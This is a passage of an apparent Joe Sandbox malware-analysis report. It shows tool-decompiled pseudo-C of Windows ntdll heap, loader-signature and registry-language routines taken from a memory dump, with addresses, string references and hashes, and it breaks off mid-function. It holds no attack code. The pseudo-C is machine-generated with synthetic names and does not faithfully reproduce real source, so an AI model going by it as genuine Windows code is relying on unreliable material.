                                          0x0111a038
                                          0x0111a003
                                          0x010dad84
                                          0x010dad89
                                          0x010dad8c
                                          0x010dad8e
                                          0x0111a042
                                          0x0111a045
                                          0x00000000
                                          0x00000000
                                          0x0111a054
                                          0x00000000
                                          0x010dad94
                                          0x010dad94
                                          0x010dad94
                                          0x010dad96
                                          0x010dad96
                                          0x010dad99
                                          0x0111a063
                                          0x0111a065
                                          0x0111a070
                                          0x0111a070
                                          0x0111a070
                                          0x0111a08d
                                          0x0111a08d
                                          0x010dada4
                                          0x010dada6
                                          0x00000000
                                          0x010dada6
                                          0x010dad8e
                                          0x010dad6d
                                          0x010dad3c
                                          0x010dad3c
                                          0x00000000
                                          0x010dad3c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010dacd8

                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0111A0CD
                                          • HEAP: , xrefs: 0111A0BA
                                          • HEAP[%wZ]: , xrefs: 0111A0AD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: d313ac9247e79a6916d9dda05b54cebb6fd31ad035e40c3e8f05010bff83f806
                                          • Instruction ID: e2aab2b45c471b0e274ad5e886560b4cf140a988f9e52f5143969d67c414ce11
                                          • Opcode Fuzzy Hash: d313ac9247e79a6916d9dda05b54cebb6fd31ad035e40c3e8f05010bff83f806
                                          • Instruction Fuzzy Hash: 4281E431304785EFE72ADBACC894BAABBF8FF04714F0445A5E5928B692D774E940CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E010CB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0116A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1198748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E010AB150();
					__eflags =  *0x1197bc8;
					if(__eflags == 0) {
						E01162073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0116A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1198720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1198720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E010CB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0116A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E010CE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                          0x010cb746
                                          0x010cb74b
                                          0x010cb74d
                                          0x010cb750
                                          0x010cb755
                                          0x010cb758
                                          0x010cb758
                                          0x010cb75e
                                          0x010cb763
                                          0x010cb764
                                          0x010cb76a
                                          0x010cb76d
                                          0x010cb771
                                          0x010cb776
                                          0x010cb85c
                                          0x010cb85d
                                          0x010cb860
                                          0x010cb865
                                          0x01112ba1
                                          0x01112ba2
                                          0x01112ba9
                                          0x01112bae
                                          0x01112bae
                                          0x010cb77c
                                          0x010cb77c
                                          0x010cb77c
                                          0x010cb785
                                          0x010cb788
                                          0x01112bb6
                                          0x01112bb9
                                          0x00000000
                                          0x00000000
                                          0x01112bbf
                                          0x01112bc5
                                          0x01112bc9
                                          0x01112be8
                                          0x01112bed
                                          0x01112bcb
                                          0x01112be0
                                          0x01112be5
                                          0x01112bf3
                                          0x01112bf8
                                          0x01112bfd
                                          0x01112c05
                                          0x01112c0e
                                          0x01112c0e
                                          0x00000000
                                          0x010cb78e
                                          0x010cb78e
                                          0x010cb78e
                                          0x010cb791
                                          0x010cb791
                                          0x010cb797
                                          0x010cb797
                                          0x010cb79f
                                          0x010cb7a9
                                          0x010cb7af
                                          0x010cb7af
                                          0x010cb7b1
                                          0x010cb7b6
                                          0x010cb7e2
                                          0x010cb7e2
                                          0x010cb7e7
                                          0x010cb880
                                          0x010cb7ed
                                          0x010cb7ed
                                          0x010cb7ed
                                          0x010cb7ef
                                          0x010cb7f2
                                          0x010cb7f2
                                          0x010cb7f5
                                          0x010cb7fa
                                          0x01112c2d
                                          0x01112c2e
                                          0x01112c39
                                          0x010cb800
                                          0x010cb800
                                          0x010cb802
                                          0x010cb805
                                          0x010cb808
                                          0x010cb808
                                          0x010cb80a
                                          0x010cb80d
                                          0x010cb816
                                          0x010cb81c
                                          0x010cb822
                                          0x010cb82f
                                          0x010cb88b
                                          0x010cb892
                                          0x010cb897
                                          0x010cb899
                                          0x010cb89b
                                          0x010cb89e
                                          0x010cb8a5
                                          0x010cb8a8
                                          0x010cb8aa
                                          0x010cb8ac
                                          0x010cb8ac
                                          0x010cb8aa
                                          0x010cb892
                                          0x010cb831
                                          0x010cb839
                                          0x010cb83b
                                          0x010cb83b
                                          0x010cb844
                                          0x010cb84b
                                          0x010cb852
                                          0x010cb7b8
                                          0x010cb7ba
                                          0x010cb7bf
                                          0x010cb7c4
                                          0x01112c18
                                          0x01112c19
                                          0x01112c23
                                          0x010cb7ca
                                          0x010cb7ca
                                          0x010cb7cc
                                          0x010cb7cf
                                          0x010cb7d1
                                          0x010cb7d1
                                          0x010cb7d4
                                          0x010cb7dc
                                          0x010cb8bb
                                          0x010cb8bb
                                          0x010cb8be
                                          0x010cb8be
                                          0x010cb8c1
                                          0x00000000
                                          0x00000000
                                          0x010cb8c3
                                          0x010cb8c5
                                          0x010cb8c7
                                          0x010cb8e0
                                          0x00000000
                                          0x010cb8e0
                                          0x010cb8cc
                                          0x010cb8cc
                                          0x00000000
                                          0x010cb8cc
                                          0x010cb8d6
                                          0x010cb8d6
                                          0x00000000
                                          0x010cb7dc
                                          0x010cb7b6

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: 343715a1d5807f8e7e1acc871db1b5ae33b09ad7b400ab507ababe5a5e978328
                                          • Instruction ID: 9e27b6d3d09a7326cba42350dd42e7bdb0ecd5635db53ff22b22095956e20f70
                                          • Opcode Fuzzy Hash: 343715a1d5807f8e7e1acc871db1b5ae33b09ad7b400ab507ababe5a5e978328
                                          • Instruction Fuzzy Hash: 0E61B170600241DFDB29DF28C446B6EBBE5FF44B44F1885ADE8898B245D731E895CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E010B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E010BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E010AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1195780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01125510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1195780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E010C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01127016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E010C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01127016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E010DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E010AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                          0x010b7e4c
                                          0x010b7e50
                                          0x010b7e55
                                          0x010b7e58
                                          0x010b7e5d
                                          0x010b7e71
                                          0x010b7f33
                                          0x010b7e77
                                          0x010b7e77
                                          0x010b7e79
                                          0x010b7e79
                                          0x010b7e7e
                                          0x010b7f45
                                          0x01109848
                                          0x00000000
                                          0x01109848
                                          0x010b7f4e
                                          0x010b7f53
                                          0x010b7f5a
                                          0x00000000
                                          0x00000000
                                          0x0110985a
                                          0x01109862
                                          0x01109866
                                          0x00000000
                                          0x0110986c
                                          0x00000000
                                          0x0110986c
                                          0x010b7e84
                                          0x010b7e84
                                          0x010b7e8d
                                          0x01109871
                                          0x010b7eb8
                                          0x010b7ec0
                                          0x010b7ec0
                                          0x010b7e9a
                                          0x0110987e
                                          0x00000000
                                          0x00000000
                                          0x01109884
                                          0x0110988b
                                          0x011098a7
                                          0x011098ac
                                          0x011098b1
                                          0x011098b6
                                          0x011098b8
                                          0x011098b8
                                          0x011098b9
                                          0x00000000
                                          0x011098b9
                                          0x010b7ea0
                                          0x010b7ea7
                                          0x00000000
                                          0x00000000
                                          0x010b7eac
                                          0x010b7eb1
                                          0x010b7ec6
                                          0x010b7ed0
                                          0x011098cc
                                          0x010b7ed6
                                          0x010b7ed6
                                          0x010b7ed6
                                          0x010b7ede
                                          0x010b7ee3
                                          0x011098e3
                                          0x011098f0
                                          0x01109902
                                          0x011098f2
                                          0x011098fb
                                          0x011098fb
                                          0x01109907
                                          0x0110991d
                                          0x0110991d
                                          0x01109907
                                          0x011098e3
                                          0x010b7ef0
                                          0x010b7f14
                                          0x010b7f14
                                          0x010b7f1e
                                          0x01109946
                                          0x010b7f24
                                          0x010b7f24
                                          0x010b7f24
                                          0x010b7f2c
                                          0x0110996a
                                          0x01109975
                                          0x01109975
                                          0x0110997e
                                          0x01109993
                                          0x01109993
                                          0x0110997e
                                          0x00000000
                                          0x010b7ef2
                                          0x010b7efc
                                          0x010b7f0a
                                          0x010b7f0e
                                          0x01109933
                                          0x00000000
                                          0x01109933
                                          0x00000000
                                          0x010b7f0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010b7eb1

                                          Strings
                                          • minkernel\ntdll\ldrmap.c, xrefs: 011098A2
                                          • LdrpCompleteMapModule, xrefs: 01109898
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01109891
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 48bfc03362db9fad05c6a4854a8391179ee9fea81e5dc21fbf2d712b4ef83048
                                          • Instruction ID: bbc01f7dd3f990ca046521d20f9ef5149083e894309f08526b5f88111853cfe0
                                          • Opcode Fuzzy Hash: 48bfc03362db9fad05c6a4854a8391179ee9fea81e5dc21fbf2d712b4ef83048
                                          • Instruction Fuzzy Hash: B0513731A0474ADBE726CB5CC9C4BAA7BE0EF88314F040599E9A19B3D2D770ED00CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011523E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E011523E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x119874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x119874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E010FD4F0(_t83, 0x1086c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E010AB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1196378 = 1;
						asm("int3");
						 *0x1196378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                          0x011523e3
                                          0x011523e8
                                          0x011523eb
                                          0x011523ee
                                          0x011523f3
                                          0x0115259b
                                          0x0115259b
                                          0x0115259d
                                          0x011525a3
                                          0x011525a3
                                          0x011523fb
                                          0x01152424
                                          0x0115244f
                                          0x01152460
                                          0x01152451
                                          0x01152451
                                          0x01152456
                                          0x01152458
                                          0x01152458
                                          0x0115245b
                                          0x0115245b
                                          0x01152426
                                          0x01152431
                                          0x01152436
                                          0x01152443
                                          0x01152438
                                          0x01152438
                                          0x01152438
                                          0x01152445
                                          0x01152445
                                          0x01152463
                                          0x01152469
                                          0x0115246f
                                          0x01152480
                                          0x01152495
                                          0x011524a1
                                          0x011524ce
                                          0x011524df
                                          0x011524d0
                                          0x011524d0
                                          0x011524d5
                                          0x011524d7
                                          0x011524d7
                                          0x011524da
                                          0x011524da
                                          0x011524a3
                                          0x011524b0
                                          0x011524b5
                                          0x011524c2
                                          0x011524b7
                                          0x011524b7
                                          0x011524b7
                                          0x011524c4
                                          0x011524c4
                                          0x011524e8
                                          0x01152497
                                          0x0115249a
                                          0x0115249a
                                          0x01152482
                                          0x01152488
                                          0x01152488
                                          0x01152471
                                          0x01152479
                                          0x01152479
                                          0x011524ef
                                          0x011523fd
                                          0x01152401
                                          0x01152412
                                          0x01152403
                                          0x01152403
                                          0x01152408
                                          0x0115240a
                                          0x0115240a
                                          0x0115240d
                                          0x0115240d
                                          0x0115241b
                                          0x0115241b
                                          0x011524f1
                                          0x011524f6
                                          0x01152507
                                          0x01152510
                                          0x00000000
                                          0x01152510
                                          0x0115250b
                                          0x00000000
                                          0x011524f8
                                          0x011524f8
                                          0x011524fc
                                          0x01152500
                                          0x01152512
                                          0x01152515
                                          0x0115251a
                                          0x01152521
                                          0x01152524
                                          0x01152529
                                          0x0115252f
                                          0x00000000
                                          0x00000000
                                          0x0115253c
                                          0x0115255c
                                          0x01152561
                                          0x0115253e
                                          0x01152554
                                          0x01152559
                                          0x0115256a
                                          0x0115256d
                                          0x01152574
                                          0x01152586
                                          0x01152588
                                          0x0115258f
                                          0x01152590
                                          0x01152590
                                          0x01152597
                                          0x00000000
                                          0x01152597

                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0115256F
                                          • HEAP: , xrefs: 0115255C
                                          • HEAP[%wZ]: , xrefs: 0115254F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: b38d69af973b5efb0ae94cc7cd3539fc8609f986ba56bdfa29b6a89973d0ebdb
                                          • Instruction ID: 2f9ac57b4adc3239f1d4fe26b775fc57896676742be13d9eb886f9ab42a52187
                                          • Opcode Fuzzy Hash: b38d69af973b5efb0ae94cc7cd3539fc8609f986ba56bdfa29b6a89973d0ebdb
                                          • Instruction Fuzzy Hash: C5512736214250CAE3BCCE2EC8447B27FF1DB44644F554859ECF28B285D736E846DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E010AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E010AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010E95D0();
						}
						if(_t78 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E010EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E010EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E010E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E010EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L010AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E010EBB40(_t83, _t102 + 0x24, _t78);
								if(L010B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E010EBB40(_t84, _t102 + 0x24, _t94);
									if(L010B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
